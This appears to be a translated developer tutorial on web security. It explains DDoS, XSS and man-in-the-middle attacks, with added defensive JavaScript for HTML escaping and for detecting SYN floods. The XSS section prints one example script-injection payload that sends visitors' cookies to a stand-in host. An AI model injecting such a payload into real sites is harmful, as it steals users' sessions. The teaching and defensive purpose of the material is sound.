
Security is no small matter. In 2016, DNS provider Dyn was hit by a massive DDoS (Distributed Denial of Service) attack that affected 14,000 website domains. In July 2020, hackers took control of the Twitter accounts of Musk, Gates, Obama and others and induced users to buy Bitcoin, eventually defrauding them of $11 million. In April 2021, hackers abused GitHub Actions (GitHub's CI/CD scheme) so that git operations triggered malicious Bitcoin mining.

Especially in a country like China, with a large population and a highly developed Internet, if an Internet company's security fails, the impact is huge. A few years ago our country had a major security incident: the user names and passwords of a well-known technology community were leaked on a large scale. We must learn from the past.

### Denial of Service attack (DoS)

Denial-of-service (DoS) attacks are common. Although the Internet is becoming more and more regulated, DoS attacks are still used by criminals to extort money. A typical example is private servers for the game Legend of Mir II: running a private server can bring in a large amount of illegal income, but because it is an underground business it is often attacked by hackers. After the attack, the hacker emails the administrator to demand money, threatening to keep attacking unless the victim pays quickly.

DoS has long been a common attack weapon. The principle of DoS is to send a large volume of traffic to a website very quickly. This traffic may be at the application layer, such as a large number of HTTP requests, or at the transport layer, such as a large number of TCP connection requests. On February 18, 2018, for example, GitHub suffered a massive DoS attack that peaked at 1.35Tbps. Later, hackers also attacked Google, Amazon and other websites.

To generate enough traffic, attackers usually do not have the financial means to buy machines; instead they use viruses and Trojans to organize the machines of others into a traffic attack. Machines infected in this way are commonly known as "broilers" (zombie machines). Top hackers often control a large number of broilers; on a single command, the broilers start frantically sending network packets to the target until the target is overwhelmed. Because the broilers are scattered around the world, this type of attack is also known as a Distributed Denial-of-Service (DDoS) attack.

### The types of DDoS

There are many types of DDoS and their methods are complex.

  • An ICMP attack uses the low-level ICMP protocol to send Ping messages directly and repeatedly.

  • A flood of UDP packets is called a UDP Flood.

  • Repeatedly sending SYN messages over TCP is called a SYN attack (SYN flood).

  • Challenge Collapsar (CC attack): simulating user behavior by constantly posting, browsing posts, browsing web pages, adding items to shopping carts, and so on.

### Preventive measures

When confronted with a DDoS attack, if you have prepared in advance you can respond calmly. For example, if you buy a firewall, the firewall identifies attack behavior by its characteristics and filters it out, so the system does not crash from DDoS overload.

Of course, if it is a pure volumetric traffic attack, relying on the firewall alone is not enough. Large Internet companies usually build multi-active deployments. Typically the equipment rooms are arranged as "two sites, three data centers" (the production environment, a same-city DR environment, and a remote DR environment), and traffic can be switched between them when a DDoS occurs.

In addition, a CDN often works well against DDoS. After all, a CDN is a large number of cache nodes, and a DDoS cannot take down the CDN. If a small team does not have enough money to buy a server, they can implement a software firewall themselves. The idea is to design a proxy server with very high throughput that acts as a reverse proxy in front of all services. If a DDoS is encountered, the proxy server can recognize certain characteristics and discard some of the traffic.

When under attack, it is necessary to degrade the service appropriately, and even to sacrifice some users in order to protect normal use for the others. A firewall works by feature recognition, so it always produces some false positives (friendly fire); when under attack, you can deliberately lower the threshold for classifying behavior as an attack. By allowing the firewall to cause a certain amount of friendly fire, more attack traffic gets identified.

### Cross-site Scripting attacks (XSS)

Let’s talk about another type of attack — cross-site scripting.

In February 2021, a test engineer in India discovered a cross-site scripting vulnerability in Apple's iCloud website and submitted a detailed description of the vulnerability and the steps that trigger it. Apple later awarded him a $5,000 bounty.

Cross-site scripting, as the name suggests, uses vulnerabilities to inject scripts into web pages. For example, input boxes for submitting personal information can lead to cross-site scripting if the input is not handled properly on the server.

Suppose you have a multi-line text input field for your personal signature. A normal user would type something interesting, but a hacker might try to type:

<script>document.createElement('img').src="https://some.site.com?cookie=document.cookie"</script>

If this text is displayed on the user's personal page, then other users who visit that user's space are attacked, and the hacker takes away the key information in their cookies.

The XSS attack pattern is simple: find a way to inject scripts into web pages. In general, input boxes are the most common source of trouble. Nowadays, with the development of front-end technology, pages built with front-end frameworks such as React or Vue have eliminated most of the possibility of XSS. But XSS can still happen if something goes wrong. Therefore, the correct approach is to ask colleagues from the security team to help scan for XSS vulnerabilities before going live.
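To show what "handling the input properly" means for the signature field above, here is an added example (not code from the original article): an escaping function, the unsafe and hardened renderers side by side, and the kind of minimal self-check a pre-release XSS scan performs. All function names are hypothetical; the sample payload is the one quoted in the article.

```javascript
// Added example, not from the original article. Names are hypothetical.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Escape the five characters that can break out of an HTML text or attribute
// context. Everything else is left untouched, so normal signatures stay readable.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Unsafe renderer: inserts the signature verbatim (the bug described above).
function renderSignatureUnsafe(signature) {
  return `<div class="signature">${signature}</div>`;
}

// Hardened renderer: the signature is escaped, so a <script> tag in it is shown
// as text rather than executed by the browser.
function renderSignatureSafe(signature) {
  return `<div class="signature">${escapeHtml(signature)}</div>`;
}

// Minimal scan check: feed a renderer a probe that would execute if reflected
// raw, and report whether it survived unescaped. Returns true when the
// renderer neutralised the probe, false when the page is injectable.
function rendererEscapesInput(render) {
  const probe = `<img src=x onerror="x">`;
  const out = render(probe);
  return !out.includes("<img") && !out.includes('onerror="x"');
}

// The payload quoted in the article, used here as a constructed test input.
const PAYLOAD =
  `<script>document.createElement('img').src="https://some.site.com?cookie=document.cookie"</script>`;
```

Run `rendererEscapesInput` against every template that echoes user input; a `false` result is exactly the kind of finding a security review should catch before release.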

### Man-in-the-middle attack

Let’s talk about man-in-the-middle attacks.

Among the telecom fraud cases our country is currently cracking down on, there is a form of attack like this. Some criminals use fake base stations: they find a crowded place and set up their own equipment disguised as a cellular base station to provide users with network access. Phones of people near the criminals may connect to the fake base station. Once connected, the criminals' fake base station becomes your Internet proxy and can perform many illegal operations. From this perspective, it would not be very difficult for a middleman to get into a network near you and act as your online "agent". Even criminals with little technical knowledge can act as middlemen simply by buying fake base station equipment.

In the event of a man-in-the-middle attack, the Internet's trust system, the operating system, the browser and so on guard the last line of defense. For example, when you visit Taobao to shop, the middleman serves you a fake web page. The browser verifies the certificate of this fake page and finds that it is not Taobao's certificate. Last year, when GitHub was suspected of being hit by a man-in-the-middle attack in China, many users in the country saw their browser warn them that the site they were visiting was unsafe. This is what happens when the browser checks the certificate and finds it suspicious. If you encounter this situation online, close the page immediately and do not continue, to avoid being cheated.


Living in this day and age, cyber security is a big deal for individuals. Your ticket information, travel records, account passwords, location information and so on all require you to have a sense of prevention, so that criminals cannot take them away. When working for a company, take care of your accounts. In particular, on the computer you work on, stay away from software obtained from unofficial sources. Once your work computer is infected with a Trojan and becomes a broiler, criminals can use it as a springboard to log in to the company's servers.

On the other hand, as a company and a team, we should also have a strong sense of security. Of course, the security field has its own expertise and talent. In the early days of an Internet product, the team often cannot afford expensive firewalls or the cost of hiring security experts; at that stage developers need to take the initiative to learn security knowledge and raise the cost of a breach as much as possible. When the business grows to a certain point, it is necessary to hire security experts and buy network security equipment, including firewalls.

Ok, so with this lesson, you can now try to answer: how do you defend against SYN attacks?

The SYN attack is a form of DDoS attack. In this form, an attacker masquerades as a client and repeatedly sends SYN requests to the server. After sending the SYN, the attacker's machine simply goes offline without sending the server an ACK. The attacker keeps sending SYNs and going offline, while the server waits for each ACK (usually longer than 3s). This results in a large number of half-open connection objects accumulating on the server side.

Given this characteristic, you can implement a TCP proxy (firewall). If it sees the behavior of sending SYN without ever sending ACK, it blocks that IP address for a period of time. This policy can be configured as a switch that is turned on when under attack. On the other hand, the number of connections the server supports can also be raised appropriately.
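The half-open-connection heuristic just described, together with the "switch" and the adjustable threshold from the firewall section above, as an added example (not code from the original article) of the decision logic such a TCP proxy would run. The event log, IP addresses and policy values are constructed for illustration; the function and field names are hypothetical.

```javascript
// Added example, not from the original article. Names and data are hypothetical.
// One observed TCP event: a client SYN, or the client's final ACK of the
// handshake. `ts` is milliseconds; `ip` is the source address.
// Constructed sample: 203.0.113.7 sends SYNs and never completes a handshake,
// 198.51.100.2 behaves normally.
const SAMPLE_EVENTS = [
  { ts: 0,   ip: "203.0.113.7",  port: 40001, type: "SYN" },
  { ts: 100, ip: "203.0.113.7",  port: 40002, type: "SYN" },
  { ts: 200, ip: "198.51.100.2", port: 50001, type: "SYN" },
  { ts: 250, ip: "198.51.100.2", port: 50001, type: "ACK" },
  { ts: 300, ip: "203.0.113.7",  port: 40003, type: "SYN" },
  { ts: 400, ip: "203.0.113.7",  port: 40004, type: "SYN" },
];

const DEFAULT_POLICY = {
  enabled: true,            // the "switch": turn on only when under attack
  timeoutMs: 3000,          // how long the server waits for the ACK (article: ~3s)
  threshold: 3,             // half-open connections per IP before blocking
  blockMs: 10 * 60 * 1000,  // how long an offending IP stays blocked
};

// Replay events up to `now` and return a Map of ip -> block-expiry timestamp
// for every source that still has at least `threshold` SYNs without an ACK
// after `timeoutMs`. Lowering `threshold` is the "accept some friendly fire"
// knob: it catches more attack traffic at the cost of some legitimate users.
function findSynOffenders(events, now, policy = DEFAULT_POLICY) {
  const blocked = new Map();
  if (!policy.enabled) return blocked;
  const pending = new Map(); // "ip:port" -> timestamp of the unanswered SYN
  for (const ev of events) {
    if (ev.ts > now) break; // events are assumed to be in time order
    const key = `${ev.ip}:${ev.port}`;
    if (ev.type === "SYN") pending.set(key, ev.ts);
    else if (ev.type === "ACK") pending.delete(key); // handshake completed
  }
  const staleCount = new Map();
  for (const [key, synTs] of pending) {
    if (now - synTs < policy.timeoutMs) continue; // still inside the wait window
    const ip = key.slice(0, key.lastIndexOf(":"));
    staleCount.set(ip, (staleCount.get(ip) || 0) + 1);
  }
  for (const [ip, n] of staleCount) {
    if (n >= policy.threshold) blocked.set(ip, now + policy.blockMs);
  }
  return blocked;
}
```

At `now = 500` nothing is stale yet and the map is empty; at `now = 5000` the four unanswered SYNs from 203.0.113.7 exceed the threshold and that address is blocked, while the well-behaved client is untouched.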